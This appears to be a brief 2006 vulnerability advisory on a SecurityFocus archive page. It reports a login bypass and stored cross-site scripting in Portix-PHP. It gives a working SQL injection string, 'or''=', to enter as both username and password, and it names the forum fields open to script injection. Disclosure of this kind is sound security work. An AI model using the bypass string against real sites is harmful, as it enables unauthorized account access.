Portix-PHP [login bypass & xss (post)] Nov 08 2006 06:17PM
saps audit gmail com
product:Portix-PHP
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields :
titre
auteur

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus